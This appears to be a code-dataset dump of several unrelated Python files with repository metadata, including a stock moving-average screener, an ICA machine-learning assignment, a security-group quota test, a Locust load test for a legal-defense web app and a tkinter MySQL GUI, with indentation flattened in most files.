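    flat_before = is_not_rising(demo[m20_para['const_rising_days']:], 'ma20',
                                m20_para['not_rising_days'])               # the 5 values before them do not rise
    return rising and flat_before                                          # True => upward inflection of the 20-day MA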
def update_stock_code():
with open('.\\stock_code.txt', 'r') as fid:
try:
stock_code_id = fid.readlines()
record_date = stock_code_id[-1]
record_date = pd.Timestamp(record_date)
now_date = pd.Timestamp(datetime.now())
diff_date = now_date - record_date
if (diff_date.days < 20):
return
except:
print("Cannot get date information from stock file")
print("Updating the stocks id from network(...)")
# The stock-code list was last refreshed more than 20 days ago, so refresh it again
with open('.\\stock_code.txt', 'w+') as fid:
stock_code_df = ts.get_today_all()
for i in stock_code_df.index:
fid.write('%s, %s\n'%(stock_code_df['code'][i], stock_code_df['name'][i]))
fid.write(datetime.now().strftime('%Y-%m-%d'))
def get_all_stock_id_and_name():
'''
Returns: a dict mapping stock id to stock name
'''
update_stock_code()
with open('.\\stock_code.txt', 'r') as fid:
stock_code_id = fid.readlines()
stock_code_id = stock_code_id[:len(stock_code_id)-1]  # the last line stores the refresh timestamp
stock_id_name_info = dict()
for stock_id_name in stock_code_id:
stock_id = stock_id_name.strip().split(',')[0]
stock_name = stock_id_name.strip().split(',')[1]
stock_id_name_info[stock_id] = stock_name
return stock_id_name_info
def Ma20_rising_strategy():
'''Buy or sell based on turning points of the ma20 curve: sell when it goes flat or falls; buy when it starts
to rise. Whether it counts as rising is judged with the parameters in m20_para.
Saves the codes of the stocks to buy together with their 20-day moving averages.
Reference: http://blog.sina.com.cn/s/blog_b598fcc90102xi1d.html
'''
with open('.\\stock_code.txt', 'r') as fid:
stock_code_id = fid.readlines()
stock_code_id = stock_code_id[:len(stock_code_id)-1]  # the last line stores the refresh timestamp
print("The following stocks' 20ma are rising:")
ma20_rising_file = open('.\\ma20\\m20_rising_stocks.txt', 'w+')
for stock_id_name in stock_code_id:
stock_id = stock_id_name.strip().split(',')[0]
stock_name = stock_id_name.strip().split(',')[1]
try:
his_data_df = ts.get_hist_data(stock_id)  # the returned data is newest-first (reverse chronological order, starting from today)
except:
print("Cannot get %s his data."%stock_id)
continue
if is_rising(his_data_df, 'ma20', m20_para['const_rising_days']) and \
is_not_rising(his_data_df[m20_para['const_rising_days']:], 'ma20', m20_para['not_rising_days']):
print('%s'%stock_id)
plt.plot(his_data_df['ma20'][100:0:-1])  # the returned data is newest-first, so reverse the slice for plotting
#plt.show()
fig_name = '.\\ma20\\%s_%s.png'%(stock_id, stock_name)
plt.savefig(fig_name)
plt.close()
ma20_rising_file.write('%s\n'%stock_id_name)
print('code: %s'%(stock_id_name))
ma20_rising_file.close()
if __name__ == '__main__':
update_stock_code()
Ma20_rising_strategy()
|
[
"qiuyemingchong@163.com"
] |
qiuyemingchong@163.com
|
a99dbfd23d95657ed987f929ac6e3d4f7fd948f8
|
a64f122dd4df3e20bc3e25aca31bb11ec9d55977
|
/Assignment 3/ICA.py
|
507e0eba4db4d38a810c8e4fc5190d3e25708cc8
|
[] |
no_license
|
mbrine555/gatech_ML
|
f9de5e1e1c29e40693030fcf3dce4797339f3ada
|
2a3dea874ac7710104fb891a5199afa9f3c046af
|
refs/heads/master
| 2020-04-16T10:39:44.328425
| 2019-04-10T11:54:37
| 2019-04-10T11:54:37
| 165,512,336
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,002
|
py
|
#%% Imports
import pandas as pd
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
from helpers import nn_arch, nn_reg
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.decomposition import FastICA
out = './ICA/'
np.random.seed(0)
digits = pd.read_hdf('./BASE/datasets.hdf','digits')
digitsX = digits.drop('Class',1).copy().values
digitsY = digits['Class'].copy().values
madelon = pd.read_hdf('./BASE/datasets.hdf','madelon')
madelonX = madelon.drop('Class',1).copy().values
madelonY = madelon['Class'].copy().values
madelonX = StandardScaler().fit_transform(madelonX)
digitsX= StandardScaler().fit_transform(digitsX)
clusters = [2,5,10,15,20,25,30,35,40]
dims = [2,3,4,5,6,7,8,9,10,11]
#raise
#%% data for 1
ica = FastICA(random_state=5)
kurt = {}
for dim in dims:
ica.set_params(n_components=dim)
tmp = ica.fit_transform(madelonX)
tmp = pd.DataFrame(tmp)
tmp = tmp.kurt(axis=0)
kurt[dim] = tmp.abs().mean()
kurt = pd.Series(kurt)
kurt.to_csv(out+'madelon scree.csv')
dims = [2,5,10,15,20,25,30,35,40,45,50,55,60]
ica = FastICA(random_state=5)
kurt = {}
for dim in dims:
ica.set_params(n_components=dim)
tmp = ica.fit_transform(digitsX)
tmp = pd.DataFrame(tmp)
tmp = tmp.kurt(axis=0)
kurt[dim] = tmp.abs().mean()
kurt = pd.Series(kurt)
kurt.to_csv(out+'digits scree.csv')
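# Illustrative follow-up (an editorial note, not part of the assignment code): since each entry of
# `kurt` is the mean absolute kurtosis of the recovered components at that dimensionality, the
# dimension that maximises it is a natural candidate for the projections used below, e.g.:
#   best_dim = kurt.idxmax()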
raise
#%% Data for 2
grid ={'ica__n_components':dims,'NN__alpha':nn_reg,'NN__hidden_layer_sizes':nn_arch}
ica = FastICA(random_state=5)
mlp = MLPClassifier(activation='relu',max_iter=2000,early_stopping=True,random_state=5)
pipe = Pipeline([('ica',ica),('NN',mlp)])
gs = GridSearchCV(pipe,grid,verbose=10,cv=5)
gs.fit(madelonX,madelonY)
tmp = pd.DataFrame(gs.cv_results_)
tmp.to_csv(out+'Madelon dim red.csv')
grid ={'ica__n_components':dims,'NN__alpha':nn_reg,'NN__hidden_layer_sizes':nn_arch}
ica = FastICA(random_state=5)
mlp = MLPClassifier(activation='relu',max_iter=2000,early_stopping=True,random_state=5)
pipe = Pipeline([('ica',ica),('NN',mlp)])
gs = GridSearchCV(pipe,grid,verbose=10,cv=5)
gs.fit(digitsX,digitsY)
tmp = pd.DataFrame(gs.cv_results_)
tmp.to_csv(out+'digits dim red.csv')
raise
#%% data for 3
# Set this from chart 2 and dump, use clustering script to finish up
dim = 45
ica = FastICA(n_components=dim,random_state=10)
madelonX2 = ica.fit_transform(madelonX)
madelon2 = pd.DataFrame(np.hstack((madelonX2,np.atleast_2d(madelonY).T)))
cols = list(range(madelon2.shape[1]))
cols[-1] = 'Class'
madelon2.columns = cols
madelon2.to_hdf(out+'datasets.hdf','madelon',complib='blosc',complevel=9)
dim = 60
ica = FastICA(n_components=dim,random_state=10)
digitsX2 = ica.fit_transform(digitsX)
digits2 = pd.DataFrame(np.hstack((digitsX2,np.atleast_2d(digitsY).T)))
cols = list(range(digits2.shape[1]))
cols[-1] = 'Class'
digits2.columns = cols
digits2.to_hdf(out+'datasets.hdf','digits',complib='blosc',complevel=9)
|
[
"briner.15@osu.edu"
] |
briner.15@osu.edu
|
0716ae0a297c478efb4cabc07dd95d1ade9b0765
|
0c85cba348e9abace4f16dfb70531c70175dac68
|
/cloudroast/networking/networks/api/security_groups/test_security_groups_quotas.py
|
711c5f5a1d12b995b33e7c5f496a7e31ad6fa4c0
|
[
"Apache-2.0"
] |
permissive
|
RULCSoft/cloudroast
|
31157e228d1fa265f981ec82150255d4b7876af2
|
30f0e64672676c3f90b4a582fe90fac6621475b3
|
refs/heads/master
| 2020-04-04T12:20:59.388355
| 2018-11-02T21:32:27
| 2018-11-02T21:32:27
| 155,923,262
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,301
|
py
|
"""
Copyright 2015 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cafe.drivers.unittest.decorators import tags
from cloudcafe.networking.networks.extensions.security_groups_api.constants \
import SecurityGroupsErrorTypes, SecurityGroupsResponseCodes
from cloudroast.networking.networks.fixtures \
import NetworkingSecurityGroupsFixture
class SecurityGroupsQuotasTest(NetworkingSecurityGroupsFixture):
@classmethod
def setUpClass(cls):
"""Setting up test data"""
super(SecurityGroupsQuotasTest, cls).setUpClass()
# Setting up
cls.expected_secgroup = cls.get_expected_secgroup_data()
cls.expected_secgroup.name = 'test_secgroup_quotas'
def tearDown(self):
self.secGroupCleanUp()
super(SecurityGroupsQuotasTest, self).tearDown()
@tags('quotas')
def test_rules_per_group(self):
"""
@summary: Testing security rules quota per group
"""
secgroup = self.create_test_secgroup(self.expected_secgroup)
expected_secrule = self.get_expected_secrule_data()
expected_secrule.security_group_id = secgroup.id
rules_per_group = self.sec.config.max_rules_per_secgroup
self.create_n_security_rules_per_group(expected_secrule,
rules_per_group)
msg = ('Successfully created the expected security rules per group '
'allowed by the quota of {0}').format(rules_per_group)
self.fixture_log.debug(msg)
# Checking the quota is enforced
request_kwargs = dict(
security_group_id=expected_secrule.security_group_id,
raise_exception=False)
resp = self.sec.behaviors.create_security_group_rule(**request_kwargs)
neg_msg = ('(negative) Creating a security rule over the group quota'
' of {0}').format(rules_per_group)
self.assertNegativeResponse(
resp=resp, status_code=SecurityGroupsResponseCodes.CONFLICT,
msg=neg_msg, delete_list=self.delete_secgroups,
error_type=SecurityGroupsErrorTypes.OVER_QUOTA)
@tags('quotas')
def test_groups_per_tenant(self):
"""
@summary: Testing security groups quota per tenant
"""
groups_per_tenant = self.sec.config.max_secgroups_per_tenant
self.create_n_security_groups(self.expected_secgroup,
groups_per_tenant)
# Checking the quota is enforced
request_kwargs = dict(
name=self.expected_secgroup.name,
description=self.expected_secgroup.description,
raise_exception=False)
resp = self.sec.behaviors.create_security_group(**request_kwargs)
neg_msg = ('(negative) Creating a security group over the tenant quota'
' of {0}').format(groups_per_tenant)
status_code = SecurityGroupsResponseCodes.CONFLICT
error_type = SecurityGroupsErrorTypes.OVER_QUOTA
self.assertNegativeResponse(
resp=resp, status_code=status_code, msg=neg_msg,
delete_list=self.delete_secgroups,
error_type=error_type)
@tags('quotas')
def test_rules_per_tenant(self):
"""
@summary: Testing security rules quota per tenant
"""
expected_secrule = self.get_expected_secrule_data()
groups_per_tenant = self.sec.config.max_secgroups_per_tenant
rules_per_tenant = self.sec.config.max_rules_per_tenant
rules_per_group = rules_per_tenant // groups_per_tenant  # integer division so the rule count stays an int on Python 3
secgroups = self.create_n_security_groups_w_n_rules(
self.expected_secgroup, expected_secrule, groups_per_tenant,
rules_per_group)
msg = ('Successfully created the expected security rules per tenant '
'allowed by the quota of {0}').format(rules_per_tenant)
self.fixture_log.debug(msg)
# Checking the quota is enforced
request_kwargs = dict(
security_group_id=secgroups[0].id,
raise_exception=False)
resp = self.sec.behaviors.create_security_group_rule(**request_kwargs)
neg_msg = ('(negative) Creating a security rule over the tenant quota'
' of {0}').format(rules_per_tenant)
self.assertNegativeResponse(
resp=resp, status_code=SecurityGroupsResponseCodes.CONFLICT,
msg=neg_msg, delete_list=self.delete_secgroups,
error_type=SecurityGroupsErrorTypes.OVER_QUOTA)
def create_n_security_groups_w_n_rules(self, expected_secgroup,
expected_secrule, groups_num,
rules_num):
"""
@summary: Creating n security groups with n rules
"""
secgroups = self.create_n_security_groups(expected_secgroup,
groups_num)
for group in secgroups:
expected_secrule.security_group_id = group.id
self.create_n_security_rules_per_group(expected_secrule, rules_num)
return secgroups
def create_n_security_groups(self, expected_secgroup, num):
"""
@summary: Creating n security groups
"""
secgroups = []
for x in range(num):
log_msg = 'Creating security group {0}'.format(x + 1)
self.fixture_log.debug(log_msg)
name = 'security_test_group_n_{0}'.format(x + 1)
expected_secgroup.name = name
secgroup = self.create_test_secgroup(expected_secgroup)
secgroups.append(secgroup)
msg = 'Successfully created {0} security groups'.format(num)
self.fixture_log.debug(msg)
return secgroups
def create_n_security_rules_per_group(self, expected_secrule, num):
"""
@summary: Creating n security rules within a security group and
verifying they are created successfully
"""
request_kwargs = dict(
security_group_id=expected_secrule.security_group_id,
raise_exception=False)
for x in range(num):
log_msg = 'Creating rule {0}'.format(x + 1)
self.fixture_log.debug(log_msg)
resp = self.sec.behaviors.create_security_group_rule(
**request_kwargs)
# Fail the test if any failure is found
self.assertFalse(resp.failures)
secrule = resp.response.entity
# Check the Security Group Rule response
self.assertSecurityGroupRuleResponse(expected_secrule, secrule)
msg = ('Successfully created {0} security rules at security group '
'{1}').format(num, expected_secrule.security_group_id)
self.fixture_log.debug(msg)
|
[
"leonardo.maycotte@rackspace.com"
] |
leonardo.maycotte@rackspace.com
|
74d2f041b4f2ac6cdb869ee1926db295164b1264
|
4b6fc63aecf127806b34998cdaef0f7342514dcd
|
/Stress/SIGI_Fase_1/Defensor.py
|
0d84b621c51b08e4bfe546158149c1af5667da44
|
[
"CC0-1.0"
] |
permissive
|
VictorAdad/sigi-api-adad
|
08365166f0443cc5f2c90fa792a63998e185f3f1
|
412511b04b420a82cf6ae5338e401b181faae022
|
refs/heads/master
| 2021-04-29T14:27:21.807529
| 2018-02-16T17:42:04
| 2018-02-16T17:42:04
| 121,772,079
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,978
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
from locust import HttpLocust, TaskSet, task
from requests_toolbelt import MultipartEncoder
from random import randrange
import requests
import mysql.connector
from mysql.connector import errorcode
import variables
import time
url = variables.url # adjust the url format if necessary (append a trailing '/' or an empty string)
documentos = variables.documentos
def login(self):
time.sleep(3)
self.client.post(url+"login", {"nombreUsuario":"ana.martinez", "password":"secret"})
print "DEFENSOR LOGIN"
def index(self):
self.client.get(url)
self.wait()
def verMisDefensas(self):
index(self)
time.sleep(3)
print("Ver mis Defensas")
self.client.get(url+"defensa/abogado")
self.wait()
def verDetalleDefensa(self):
idDefensa = findDefensa()
print("Ver Detalle de la defensa: "+str(idDefensa))
if idDefensa!=0:
self.client.get(url+"defensa/"+idDefensa)
self.wait()
def crearEtapasProcesales(self, idDefensa):
print("Crear la etapas procesales")
#audienciaInicial(self, idDefensa, "Control Detención - Audiencia Inicial", "controlDetencion/new/"+idDefensa)
#otrasAudiencias(self, idDefensa, "Otras Audiencias", "audiencia/new/"+idDefensa+"/E")
#acusacion(self, idDefensa, "Acusacion", "acusacion/new/"+idDefensa)
options = randrange(1,4)
print("ETAPA NUMERO: "+str(options))
# dispatch lazily so only the randomly chosen etapa is created
etapas = {
1 : lambda: audienciaInicial(self, idDefensa, "Control Detención - Audiencia Inicial", "controlDetencion/new/"+str(idDefensa)),
2 : lambda: otrasAudiencias(self, idDefensa, "Otras Audiencias", "audiencia/new/"+idDefensa+"/E"),
3 : lambda: acusacion(self, idDefensa, "Acusacion", "acusacion/new/"+idDefensa)
}
etapas[options]()
self.wait()
def audienciaInicial(self, idDefensa, etapa, urlEtapa):
print("Crear la Etapa Procesal: "+etapa+" Para la defensa: "+str(idDefensa))
self.client.get(url+urlEtapa)
i = randrange(0,6)
print("Sube Documento "+documentos[i][0])
m = MultipartEncoder(
fields={
"fecha":"18/07/2016",
"hora":"16:00",
"tipoAudiencia":"Inicial",
"antecedente":"false",
"action":"Crear",
"documentos": (documentos[i][0], open('Files/'+documentos[i][0], 'rb'),documentos[i][1])
})
time.sleep(3)
self.client.post(url+"controlDetencion/"+idDefensa, data = m, headers={'Content-Type': m.content_type})
self.wait()
def otrasAudiencias(self, idDefensa, etapa, urlEtapa):
print("Crear la Etapa Procesal: "+etapa+" Para la defensa: "+str(idDefensa))
self.client.get(url+urlEtapa)
i = randrange(0,4)
print("Sube Documento "+documentos[i][0])
m = MultipartEncoder(
fields={
"clasificacion": "E",
"tipoAudiencia": "Intermedia",
"organoJurisdiccional.id":"10027",
"fechaAudiencia":"29/07/2016",
"horaAudiencia":"10:00",
"fundamentoLegal":"Fundamento legal de la audiencia",
"comentarios":"La Audiencia de ... se llevará a cabo con el fin de ...",
"causaMotivo":"",
"sintesisAudiencia":"Síntesis de la Audiencia ...",
"antecedente":"false",
"documentos": (documentos[i][0], open('Files/'+documentos[i][0], 'r'),documentos[i][1])
})
time.sleep(3)
self.client.post(url+"audiencia/"+idDefensa+"/0", data = m, headers={'Content-Type': m.content_type})
self.wait()
def acusacion(self, idDefensa, etapa, urlEtapa):
print("Crear la Etapa Procesal: "+etapa+" Para la defensa: "+str(idDefensa))
self.client.get(url+urlEtapa)
i = randrange(0,4)
print("Sube Documento "+documentos[i][0])
m = MultipartEncoder(
fields={
"fechaPresentacion":"20/07/2016",
"delitos":"111,149",
"clasificacionLegal":"Clasificación Legal de la Acusación",
"coadyuvanciaAcusacion":"false",
"delitosCoadyuvancia":"",
"fechaAudienciaIntermedia":"25/07/2016",
"horaAudienciaIntermedia":"17:00",
"documentos": (documentos[i][0], open('Files/'+documentos[i][0], 'r'),documentos[i][1])
})
time.sleep(3)
self.client.post(url+"acusacion/"+idDefensa, data = m, headers={'Content-Type': m.content_type})
self.wait()
def GuardarSituacionJuridicaDefensa(self):
idDefensa = findDefensa()
print("Guardar Situació Jurídica de Defensa para Mayores de Edad: "+str(idDefensa))
if idDefensa != 0:
self.client.post(url+"defensa/"+idDefensa, data = {
"edadDelito": "25",
"fechaInicioTermino":"16/07/2016",
"horaInicioTermino": "15:00",
"delitos":"311,48",
"observaciones":"El peticionario se encuentra en una situación ... Para lo cual se recomienda ...",
"defensorAsistio":"",
"defensoresAutorizados":""
})
self.wait()
crearEtapasProcesales(self, idDefensa)
def findDefensa():
defensaId = 0
try:
conn = mysql.connector.connect(user = variables.DB_USER, password=variables.DB_PASS, database = variables.DB_NAME, host =variables.DB_HOST)
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("Database does not exists")
else:
print(err)
else:
cursor = conn.cursor()
query = ("SELECT id FROM defensa WHERE usuario_id = 27 AND edad_delito is null")
print(query)
cursor.execute(query)
print(cursor)
available = []
for id in cursor:
print("VALUE %s" % str(id[0]) )
available.append(str(id[0]))
print(available)
print(len(available))
if len(available) != 0:
maxNumber = len(available)-1
if maxNumber == 0:
defensaId = available[maxNumber]
else:
defensaId = available[randrange(maxNumber)]
else:
defensaId = 0
print("No hay Defensas disponibles pendientes...")
cursor.close()
conn.close()
return defensaId
class UserTasks(TaskSet):
tasks = {
index:2,
verMisDefensas:2,
verDetalleDefensa:2,
GuardarSituacionJuridicaDefensa:2
}
def on_start(self):
login(self)
|
[
"evomatik@localhost.localdomain"
] |
evomatik@localhost.localdomain
|
d9f0bd32c021cff6d85d2b4c86f7c6a119a3be14
|
0912be54934d2ac5022c85151479a1460afcd570
|
/Ch07_Code/GUI_MySQL.py
|
cf54d12400d1045cffa7dcdeaa05f864343ff849
|
[
"MIT"
] |
permissive
|
actuarial-tools/Python-GUI-Programming-Cookbook-Third-Edition
|
6d9d155663dda4450d0b180f43bab46c24d18d09
|
8c9fc4b3bff8eeeda7f18381faf33c19e98a14fe
|
refs/heads/master
| 2023-01-31T13:11:34.315477
| 2020-12-15T08:21:06
| 2020-12-15T08:21:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,876
|
py
|
'''
Created on May 29, 2019
@author: Burkhard
'''
#======================
# imports
#======================
import tkinter as tk
from tkinter import ttk
from tkinter import scrolledtext
from tkinter import Menu
from tkinter import Spinbox
from Ch07_Code.ToolTip import ToolTip
from threading import Thread
from time import sleep
from queue import Queue
from tkinter import filedialog as fd
from os import path, makedirs
from tkinter import messagebox as mBox
from Ch07_Code.GUI_MySQL_class import MySQL
# Module level GLOBALS
GLOBAL_CONST = 42
fDir = path.dirname(__file__)
netDir = fDir + '\\Backup'
if not path.exists(netDir):
makedirs(netDir, exist_ok = True)
WIDGET_LABEL = ' Widgets Frame '
#===================================================================
class OOP():
def __init__(self):
# Create instance
self.win = tk.Tk()
# Add a title
self.win.title("Python GUI")
# Disable resizing the window
self.win.resizable(0,0)
# Create a Queue
self.guiQueue = Queue()
self.createWidgets()
# populate Tab 2 Entries
self.defaultFileEntries()
# create MySQL instance
self.mySQL = MySQL()
def defaultFileEntries(self):
self.fileEntry.delete(0, tk.END)
self.fileEntry.insert(0, 'Z:\\') # bogus path
self.fileEntry.config(state='readonly')
self.netwEntry.delete(0, tk.END)
self.netwEntry.insert(0, 'Z:\\Backup') # bogus path
# Combobox callback
def _combo(self, val=0):
value = self.combo.get()
self.scr.insert(tk.INSERT, value + '\n')
# Spinbox callback
def _spin(self):
value = self.spin.get()
self.scr.insert(tk.INSERT, value + '\n')
# Checkbox callback
def checkCallback(self, *ignoredArgs):
# only enable one checkbutton
if self.chVarUn.get(): self.check3.configure(state='disabled')
else: self.check3.configure(state='normal')
if self.chVarEn.get(): self.check2.configure(state='disabled')
else: self.check2.configure(state='normal')
# Radiobutton callback function
def radCall(self):
radSel=self.radVar.get()
if radSel == 0: self.mySQL2.configure(text=WIDGET_LABEL + 'in Blue')
elif radSel == 1: self.mySQL2.configure(text=WIDGET_LABEL + 'in Gold')
elif radSel == 2: self.mySQL2.configure(text=WIDGET_LABEL + 'in Red')
# Exit GUI cleanly
def _quit(self):
self.win.quit()
self.win.destroy()
exit()
def methodInAThread(self, numOfLoops=10):
for idx in range(numOfLoops):
sleep(1)
self.scr.insert(tk.INSERT, str(idx) + '\n')
sleep(1)
print('methodInAThread():', self.runT.isAlive())
# Running methods in Threads
def createThread(self, num):
self.runT = Thread(target=self.methodInAThread, args=[num])
self.runT.setDaemon(True)
self.runT.start()
print(self.runT)
print('createThread():', self.runT.isAlive())
# textBoxes are the Consumers of Queue data
writeT = Thread(target=self.useQueues, daemon=True)
writeT.start()
# Create Queue instance
def useQueues(self):
# Now using a class member Queue
while True:
qItem = self.guiQueue.get()
print(qItem)
self.scr.insert(tk.INSERT, qItem + '\n')
# Button callback
def insertQuote(self):
title = self.bookTitle.get()
page = self.pageNumber.get()
quote = self.quote.get(1.0, tk.END)
print(title)
print(quote)
self.mySQL.insertBooks(title, page, quote)
# Button callback
def getQuote(self):
allBooks = self.mySQL.showBooks()
print(allBooks)
self.quote.insert(tk.INSERT, allBooks)
# Button callback
def modifyQuote(self):
raise NotImplementedError("This still needs to be implemented for the SQL command.")
#####################################################################################
def createWidgets(self):
# Tab Control introduced here --------------------------------------
tabControl = ttk.Notebook(self.win) # Create Tab Control
tab1 = ttk.Frame(tabControl) # Create a tab
tabControl.add(tab1, text='MySQL') # Add the tab
tab2 = ttk.Frame(tabControl) # Add a second tab
tabControl.add(tab2, text='Widgets') # Make second tab visible
tabControl.pack(expand=1, fill="both") # Pack to make visible
# ~ Tab Control introduced here -----------------------------------------
# We are creating a container frame to hold all other widgets
self.mySQL = ttk.LabelFrame(tab1, text=' Python Database ')
self.mySQL.grid(column=0, row=0, padx=8, pady=4)
# Creating a Label
ttk.Label(self.mySQL, text="Book Title:").grid(column=0, row=0, sticky='W')
# Adding a Textbox Entry widget
book = tk.StringVar()
self.bookTitle = ttk.Entry(self.mySQL, width=34, textvariable=book)
self.bookTitle.grid(column=0, row=1, sticky='W')
# Adding a Textbox Entry widget
book1 = tk.StringVar()
self.bookTitle1 = ttk.Entry(self.mySQL, width=34, textvariable=book1)
self.bookTitle1.grid(column=0, row=2, sticky='W')
# Adding a Textbox Entry widget
book2 = tk.StringVar()
self.bookTitle2 = ttk.Entry(self.mySQL, width=34, textvariable=book2)
self.bookTitle2.grid(column=0, row=3, sticky='W')
# Creating a Label
ttk.Label(self.mySQL, text="Page:").grid(column=1, row=0, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber.grid(column=1, row=1, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber1 = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber1.grid(column=1, row=2, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber2 = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber2.grid(column=1, row=3, sticky='W')
# Adding a Button
self.action = ttk.Button(self.mySQL, text="Insert Quote", command=self.insertQuote)
self.action.grid(column=2, row=1)
# Adding a Button
self.action1 = ttk.Button(self.mySQL, text="Get Quotes", command=self.getQuote)
self.action1.grid(column=2, row=2)
# Adding a Button
self.action2 = ttk.Button(self.mySQL, text="Modify Quote", command=self.modifyQuote)
self.action2.grid(column=2, row=3)
# Add some space around each widget
for child in self.mySQL.winfo_children():
child.grid_configure(padx=2, pady=4)
quoteFrame = ttk.LabelFrame(tab1, text=' Book Quotation ')
quoteFrame.grid(column=0, row=1, padx=8, pady=4)
# Using a scrolled Text control
quoteW = 40; quoteH = 6
self.quote = scrolledtext.ScrolledText(quoteFrame, width=quoteW, height=quoteH, wrap=tk.WORD)
self.quote.grid(column=0, row=8, sticky='WE', columnspan=3)
# Add some space around each widget
for child in quoteFrame.winfo_children():
child.grid_configure(padx=2, pady=4)
#======================================================================================================
# Tab Control 2
#======================================================================================================
# We are creating a container frame to hold all other widgets -- Tab2
self.mySQL2 = ttk.LabelFrame(tab2, text=WIDGET_LABEL)
self.mySQL2.grid(column=0, row=0, padx=8, pady=4)
# Creating three checkbuttons
self.chVarDis = tk.IntVar()
self.check1 = tk.Checkbutton(self.mySQL2, text="Disabled", variable=self.chVarDis, state='disabled')
self.check1.select()
self.check1.grid(column=0, row=0, sticky=tk.W)
self.chVarUn = tk.IntVar()
self.check2 = tk.Checkbutton(self.mySQL2, text="UnChecked", variable=self.chVarUn)
self.check2.deselect()
self.check2.grid(column=1, row=0, sticky=tk.W )
self.chVarEn = tk.IntVar()
self.check3 = tk.Checkbutton(self.mySQL2, text="Toggle", variable=self.chVarEn)
self.check3.deselect()
self.check3.grid(column=2, row=0, sticky=tk.W)
# trace the state of the two checkbuttons
self.chVarUn.trace('w', lambda unused0, unused1, unused2 : self.checkCallback())
self.chVarEn.trace('w', lambda unused0, unused1, unused2 : self.checkCallback())
# Radiobutton list
colors = ["Blue", "Gold", "Red"]
self.radVar = tk.IntVar()
# Selecting a non-existing index value for radVar
self.radVar.set(99)
# Creating all three Radiobutton widgets within one loop
for col in range(3):
curRad = 'rad' + str(col)
curRad = tk.Radiobutton(self.mySQL2, text=colors[col], variable=self.radVar, value=col, command=self.radCall)
curRad.grid(column=col, row=6, sticky=tk.W, columnspan=3)
# And now adding tooltips
ToolTip(curRad, 'This is a Radiobutton control.')
# Create a container to hold labels
labelsFrame = ttk.LabelFrame(self.mySQL2, text=' Labels within a Frame ')
labelsFrame.grid(column=0, row=7, pady=6)
# Place labels into the container element - vertically
ttk.Label(labelsFrame, text="Choose a number:").grid(column=0, row=0)
ttk.Label(labelsFrame, text="Label 2").grid(column=0, row=1)
# Add some space around each label
for child in labelsFrame.winfo_children():
child.grid_configure(padx=6, pady=1)
number = tk.StringVar()
self.combo = ttk.Combobox(self.mySQL2, width=12, textvariable=number)
self.combo['values'] = (1, 2, 4, 42, 100)
self.combo.grid(column=1, row=7, sticky=tk.W)
self.combo.current(0)
self.combo.bind('<<ComboboxSelected>>', self._combo)
# Adding a Spinbox widget using a set of values
self.spin = Spinbox(self.mySQL2, values=(1, 2, 4, 42, 100), width=5, bd=8, command=self._spin)
self.spin.grid(column=2, row=7, sticky='W,', padx=6, pady=1)
# Using a scrolled Text control
scrolW = 40; scrolH = 1
self.scr = scrolledtext.ScrolledText(self.mySQL2, width=scrolW, height=scrolH, wrap=tk.WORD)
self.scr.grid(column=0, row=8, sticky='WE', columnspan=3)
# Create Manage Files Frame ------------------------------------------------
mngFilesFrame = ttk.LabelFrame(tab2, text=' Manage Files: ')
mngFilesFrame.grid(column=0, row=1, sticky='WE', padx=10, pady=5)
# Button Callback
def getFileName():
print('hello from getFileName')
fDir = path.dirname(__file__)
fName = fd.askopenfilename(parent=self.win, initialdir=fDir)
print(fName)
self.fileEntry.config(state='enabled')
self.fileEntry.delete(0, tk.END)
self.fileEntry.insert(0, fName)
if len(fName) > self.entryLen:
self.fileEntry.config(width=len(fName) + 3)
# Add Widgets to Manage Files Frame
lb = ttk.Button(mngFilesFrame, text="Browse to File...", command=getFileName)
lb.grid(column=0, row=0, sticky=tk.W)
#-----------------------------------------------------
file = tk.StringVar()
self.entryLen = scrolW - 4
self.fileEntry = ttk.Entry(mngFilesFrame, width=self.entryLen, textvariable=file)
self.fileEntry.grid(column=1, row=0, sticky=tk.W)
#-----------------------------------------------------
logDir = tk.StringVar()
self.netwEntry = ttk.Entry(mngFilesFrame, width=self.entryLen, textvariable=logDir)
self.netwEntry.grid(column=1, row=1, sticky=tk.W)
def copyFile():
import shutil
src = self.fileEntry.get()
file = src.split('/')[-1]
dst = self.netwEntry.get() + '\\'+ file
try:
shutil.copy(src, dst)
mBox.showinfo('Copy File to Network', 'Succes: File copied.')
except FileNotFoundError as err:
mBox.showerror('Copy File to Network', '*** Failed to copy file! ***\n\n' + str(err))
except Exception as ex:
mBox.showerror('Copy File to Network', '*** Failed to copy file! ***\n\n' + str(ex))
cb = ttk.Button(mngFilesFrame, text="Copy File To : ", command=copyFile)
cb.grid(column=0, row=1, sticky=tk.E)
# Add some space around each label
for child in mngFilesFrame.winfo_children():
child.grid_configure(padx=6, pady=6)
# Creating a Menu Bar ==========================================================
menuBar = Menu(tab1)
self.win.config(menu=menuBar)
# Add menu items
fileMenu = Menu(menuBar, tearoff=0)
fileMenu.add_command(label="New")
fileMenu.add_separator()
fileMenu.add_command(label="Exit", command=self._quit)
menuBar.add_cascade(label="File", menu=fileMenu)
# Add another Menu to the Menu Bar and an item
helpMenu = Menu(menuBar, tearoff=0)
helpMenu.add_command(label="About")
